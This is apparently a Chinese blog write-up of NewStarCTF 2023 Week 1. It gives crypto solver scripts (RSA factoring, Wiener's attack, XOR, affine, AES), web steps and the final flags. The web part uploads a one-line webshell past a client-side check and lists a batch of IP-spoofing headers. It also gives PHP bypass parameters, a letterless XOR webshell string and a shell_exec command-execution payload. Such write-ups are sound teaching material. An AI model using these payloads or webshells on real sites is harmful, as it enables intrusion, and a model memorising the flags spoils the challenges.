2023 NewStarCTF WEEK1



crypto

brainfuck

题目

++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.

直接在线解码

https://www.splitbrain.org/services/ook

image-20230925215903062

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar’s Secert

题目

kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}

随波逐流一把梭

image-20230925220036812

flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

题目

fa{ereigtepanet6680}lgrodrn_h_litx#8fc3

随波逐流一把梭 分为两栏

image-20230925220207809

flag{reordering_the_plaintext#686f8c03}

Vigenère

题目

pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}
le chiffre indéchiffrable

一把梭

image-20230925221304658

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

题目

from Crypto.Util.number import *
from flag import flag

def gen_prime(n):
    """Return the product of fifteen freshly generated n-bit primes.

    Despite the name, the result is a composite number; the script uses it
    as the RSA modulus. Every factor is only ``n`` bits long, so the total
    size of the modulus says little about how hard it is to factor: that is
    governed by the size of the individual prime factors.

    :param n: bit length passed to ``getPrime`` for each factor
    :return: product of the fifteen primes
    """
    product = 1
    for _ in range(15):
        product *= getPrime(n)
    return product


if __name__ == '__main__':
    # Multi-prime RSA: the modulus is built from fifteen 32-bit primes, so
    # each factor is far smaller than the primes of a normal RSA key.
    e = 65537
    n = gen_prime(32)
    m = bytes_to_long(flag)
    c = pow(m, e, n)
    # Publish the modulus first, then the ciphertext, one value per line.
    for value in (n, c):
        print(value)
# 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
# 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

脚本

n 由 15 个 32 位素数相乘得到,每个因子都很小,可以直接分解 n,再按多素数 RSA 计算 φ(n) = ∏(p_i − 1) 解密

from Crypto.Util.number import *
import gmpy2

e = 65537
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

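# Prime factors of n. They are hard-coded here; this script does not compute
# them itself.
pq = [2217990919, 2338725373, 2370292207, 2463878387, 2706073949,
      2794985117, 2804303069, 2923072267, 2970591037, 3207148519,
      3654864131, 3831680819, 3939901243, 4093178561, 4278428893]

# Guard against a wrong or incomplete factor list: the phi computed below is
# only valid when the factors multiply back to n exactly and none repeats.
product = 1
for prime in pq:
    product *= prime
if product != n or len(set(pq)) != len(pq):
    raise ValueError("pq is not a complete list of distinct prime factors of n")

# For distinct primes p_1..p_k, phi(n) = (p_1 - 1) * ... * (p_k - 1).
phi = 1
for i in pq:
    phi *= i - 1

# Private exponent, then textbook RSA decryption.
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(int(m))
print(flag)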
flag{us4_s1ge_t0_cal_phI}

Small d

题目

from secret import flag
from Crypto.Util.number import *

# Two independent 1024-bit primes give a 2048-bit modulus.
p = getPrime(1024)
q = getPrime(1024)
n = p * q
phi = (p - 1) * (q - 1)

# The private exponent is chosen first and is only a 32-bit prime; the public
# exponent is then derived from it. A private exponent below roughly
# n**(1/4) / 3 can be recovered from (e, n) alone (Wiener's bound), which is
# the weakness this challenge demonstrates. Standard key generation does the
# opposite: it fixes a small e and derives a full-size d.
d = getPrime(32)
e = inverse(d, phi)

m = bytes_to_long(flag)
c = pow(m, e, n)

# Output order: ciphertext, public exponent, modulus.
for value in (c, e, n):
    print(value)

c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

脚本

d 只有 32 位,远小于 n^{1/4}/3,满足维纳攻击(Wiener's attack)的条件,用 e/n 的连分数渐近分数即可求出 d

import gmpy2
import libnum

def continuedFra(x, y):
    """Expand the fraction x / y into its continued-fraction terms.

    This is the Euclidean algorithm with every quotient recorded.

    :param x: numerator
    :param y: denominator
    :return: list of continued-fraction terms (empty when y is 0)
    """
    terms = []
    while y != 0:
        quotient, remainder = divmod(x, y)
        terms.append(quotient)
        x, y = y, remainder
    return terms
def gradualFra(cf):
    """Evaluate a continued-fraction term list from the last term backwards.

    Note the order of the result: for terms [a0, a1, ...] describing the
    value p / q, the function returns ``(q, p)``, i.e. the reciprocal of the
    convergent as (numerator, denominator). For example [4, 2, 6, 7]
    (= 415 / 93) yields ``(93, 415)``.

    :param cf: list of continued-fraction terms
    :return: tuple (numerator, denominator) of the reciprocal convergent;
             ``(0, 1)`` for an empty list
    """
    upper = 0
    lower = 1
    for term in reversed(cf):
        # One step of 1 / (term + upper / lower); numerator and denominator
        # are tracked separately so everything stays in integers.
        new_lower = term * lower + upper
        upper = lower
        lower = new_lower
    return upper, lower
def solve_pq(a, b, c):
    """Solve a*x^2 + b*x + c = 0 in integers via the quadratic formula.

    By Vieta's formulas p and q are the roots of x^2 - (p + q)*x + p*q = 0.
    The square root is an integer (floor) square root, so the result is only
    exact when the discriminant is a perfect square; the caller is expected
    to verify the product of the returned values.

    NOTE(review): wienerAttack passes b = n - phi + 1, i.e. +(p + q) rather
    than -(p + q), so for the correct phi the returned values are -p and -q.
    Their product is still n, which is all the caller checks.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: tuple of the two candidate roots
    """
    root = gmpy2.isqrt(b * b - 4 * a * c)
    two_a = 2 * a
    return (-b + root) // two_a, (-b - root) // two_a
def getGradualFra(cf):
    """Return the gradualFra() result for every non-empty prefix of cf.

    :param cf: list of continued-fraction terms
    :return: list with one gradualFra() tuple per prefix, shortest prefix
             first
    """
    return [gradualFra(cf[:end]) for end in range(1, len(cf) + 1)]


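def wienerAttack(e, n):
    """Search the convergents of e / n for a small RSA private exponent.

    Each convergent k / d of e / n is treated as a guess for the k and d in
    e*d = 1 + k*phi. A guess is accepted when the phi it implies leads to
    two integers whose product is n.

    The search only succeeds when d is small relative to n (Wiener's bound
    is roughly d < n**(1/4) / 3). Keys generated the usual way, with a fixed
    small e and a full-size d, are not affected.

    :param e: public exponent
    :param n: RSA modulus
    :return: the private exponent d, or None when no convergent fits
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            # phi must be an integer for this guess to make sense.
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1  # equals p + q when phi is correct
        if s * s < 4 * n:
            # Negative discriminant: no real roots, and the integer square
            # root inside solve_pq is undefined for it. Skip the guess
            # instead of letting the whole search abort.
            continue
        p, q = solve_pq(1, s, n)
        if p * q == n:
            return d
    return None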


c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

# Recover the private exponent from the public key alone, then decrypt.
d = wienerAttack(e, n)
m = pow(c, d, n)
plaintext = libnum.n2s(m)
print(plaintext.decode())
flag{learn_some_continued_fraction_technique#dc16885c}

babyxor

题目

from secret import *

# Every plaintext byte is XORed with the same ``key`` value (presumably a
# single integer below 256, since the results are packed with bytes()).
# One known plaintext byte is therefore enough to reveal the key.
ciphertext = [f ^ key for f in flag]

print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

脚本

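c = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
# Known plaintext: the flag format fixes the first four characters.
m = 'flag'
print(c[0])

# Single-byte XOR is its own inverse, so key = ciphertext byte ^ plaintext
# byte. Deriving it here replaces the hard-coded constant 143.
key = c[0] ^ ord(m[0])
# The remaining known characters must agree with the same key; otherwise the
# ciphertext was not produced by a single-byte XOR of such a text.
if any(byte ^ key != ord(ch) for byte, ch in zip(c, m)):
    raise ValueError("ciphertext is not a single-byte XOR of a text starting with " + repr(m))

plaintext = ''.join(chr(byte ^ key) for byte in c)
print(plaintext, end='')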
flag{x0r_15_symm3try_and_e4zy!!!!!!}

babyencoding

题目

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

三段依次用 base64、base32、uuencode 解码,然后拼接

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

Affine

题目

from flag import flag, key

modulus = 256

# Affine map over single bytes: c = (key[0] * f + key[1]) mod 256.
# There are only two unknowns, so two known plaintext bytes with an
# invertible difference are enough to solve for both.
ciphertext = [(key[0] * f + key[1]) % modulus for f in flag]

print(bytes(ciphertext).hex())

# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064

脚本

from Crypto.Util.number import *
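ciphertext_hex = 'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064'
ciphertext_bytes = bytes.fromhex(ciphertext_hex)
print(ciphertext_bytes[0] - ciphertext_bytes[1])

# Known plaintext: the flag starts with "flag". Subtracting the equations for
# 'l' (index 1) and 'a' (index 2) removes b:
#   c1 - c2 = a * (ord('l') - ord('a'))  (mod 256)
# ord('l') - ord('a') = 11 is odd, so it has an inverse modulo 256.
a = ((ciphertext_bytes[1] - ciphertext_bytes[2]) * inverse(ord('l') - ord('a'), 256)) % 256
print(a)

# With a known, b follows from the first byte: c0 = a * ord('f') + b.
b = (ciphertext_bytes[0] - a * ord('f')) % 256
print(b)

# The map is only reversible when a is coprime to 256, i.e. odd.
if a % 2 == 0:
    raise ValueError("recovered multiplier is even, so it has no inverse modulo 256")

# Decryption: f = a^-1 * (c - b) mod 256. The inverse is computed once
# instead of once per byte, and the characters are joined in one pass.
a_inv = inverse(a, 256)
flag = ''.join(chr((a_inv * (i - b)) % 256) for i in ciphertext_bytes)
print(flag)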
flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

题目

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


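def pad(data):
    """Zero-pad ``data`` to a whole number of 16-byte AES blocks.

    Inputs shorter than 16 bytes (including the empty string) are extended
    to exactly one block, as before. Inputs longer than one block are now
    extended to the next multiple of 16; previously they were returned
    unchanged, which CBC encryption rejects when the length is not
    block-aligned.

    Zero padding cannot be removed unambiguously when the data itself may
    end in NUL bytes; PKCS#7 padding avoids that ambiguity.

    :param data: bytes to pad
    :return: ``data`` followed by as many ``\\x00`` bytes as needed
    """
    block = 16
    if len(data) < block:
        missing = block - len(data)
    else:
        missing = -len(data) % block
    return data + b'\x00' * missing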


def main():
    """Encrypt the padded flag with AES-CBC and print a leak plus ciphertext.

    Two design flaws are visible here:

    * The 32-byte key is one 16-byte random value repeated twice, so it
      carries only 128 bits of entropy and its two halves are identical.
    * The printed integer is key XOR iv XOR 1. The IV is only 16 bytes, so
      it touches just the low 16 bytes of the key; the high 16 bytes of the
      key appear in the output unchanged. Because both key halves are equal,
      that reveals the whole key and, from it, the IV.
    """
    padded_flag = pad(flag)
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    leak = bytes_to_long(key) ^ bytes_to_long(iv) ^ 1
    print(leak)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    print(cipher.encrypt(padded_flag))


if __name__ == "__main__":
    main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

脚本

from Crypto.Cipher import AES
from Crypto.Util.number import *
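xor = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc_flag = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

# From the encryption logic: the key is 32 bytes and the IV is 16 bytes, and
# the two were XORed as integers. The high 128 bits of the key are therefore
# unchanged in the output, and since the key is one 16-byte value repeated
# twice, XORing those high bits against the low half of the output recovers
# both the key and the IV.

# Fixed-width conversion keeps the slice aligned even if the key happens to
# start with a zero byte.
key_bytes = xor.to_bytes(32, 'big')[:16] * 2
# The challenge printed key ^ iv ^ 1, so the extra "^ 1" has to be undone as
# well; without it the lowest bit of the IV (and of the last byte of the
# first plaintext block) comes out flipped.
iv = int.from_bytes(key_bytes, 'big') ^ xor ^ 1
# Always 16 bytes, even when the IV has leading zero bytes.
iv_bytes = iv.to_bytes(16, 'big')
aes = AES.new(key_bytes, AES.MODE_CBC, iv_bytes)
flag = aes.decrypt(enc_flag)
print(flag)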
flag{firsT_cry_Aes}

WEB

泄漏的秘密

扫描文件根目录

得到robots.txt www.zip

image-20230926003210420

image-20230926003251263

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

明显是前端校验:文件类型只在浏览器端用 JavaScript 检查

image-20230926003857348

直接禁用js然后上传一句话木马

蚁剑连接

image-20230926004003395

image-20230926004026959

flag{aa3b46bf-ee7e-49af-b98b-f45b79446145}

ErrorFlask

根据提示error首先想办法让他报错,传参不是数字就行

报错之后

image-20230926005307501

点击一下这个地方

image-20230926005331699

flag{Y0u_@re_3enset1ve_4bout_deb8g}

Begin of HTTP

首先get给ctf传参

?ctf=111

image-20230926011030652

查看源代码

post传参内容

image-20230926011115263

base64解码得n3wst4rCTF2023g00000d

post传参

image-20230926011202948

下面的操作在BP上做

改power=ctfer

image-20230926011337783

改User-Agent:NewStarCTF2023

image-20230926011445804

改referer:newstarctf.com

image-20230926011540419

加上X-Forwarded-For:127.0.0.1

不太行那我就上大招了

把这些表示本地的请求头都粘上去

Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1

image-20230926011724759

Begin of PHP

绕过level1

image-20230926012147853

数组绕过level2

image-20230926012357384

数组绕过level3

image-20230926012841423

绕过level4

image-20230926013228834

level5无数字字母webshell

flag5=True
?key1=s155964671a&key2=s214587387a&key4[]=1&key5=3000a
key3[]=1&flag5="/-_["^"{_*>"

image-20230926033832693

R!C!E!

payload

password=114514&e[v.a.l=echo shell_exec('ca\t /fla*');

image-20230926101203311

EasyLogin

弱口令

admin 000000

抓包

找到一个响应为302的POST请求包

image-20230927235459975

Misc

CyberChef’s Secret

题目

来签到吧!下面这个就是flag,不过它看起来好像怪怪的:-)
M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

base32

gprRdQCoa6VMNpWA1K1rjW7dWBgadzFcSrixdcX69YxLeKn8L

然后base58

image-20230926081748097

flag{Base_15_S0_Easy_^_^}

机密图片

lsb一把梭

image-20230926105449239

流量!鲨鱼!

首先导出流量里面所有HTTP包,然后找到

image-20230926111405507

这个文件

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

base64解码

ZmxhZ3tXcmkzNWg0cmtfMXNfdTUzZnVsX2I3MmE2MDk1MzdlNn0K

再次base64

flag{Wri35h4rk_1s_u53ful_b72a609537e6}

空白格

https://vii5ard.github.io/whitespace/

直接复制进去RUN

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

压缩包们

手动修复压缩包

image-20230928171950323

然后爆破密码

image-20230928172015878

image-20230928172026907

隐秘的眼睛

image-20230928172857243

RE

easy_RE

直接拖进IDA

image-20230926210934350

image-20230926210957430

flag{we1c0me_to_rev3rse!!}

文章作者: f14g
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !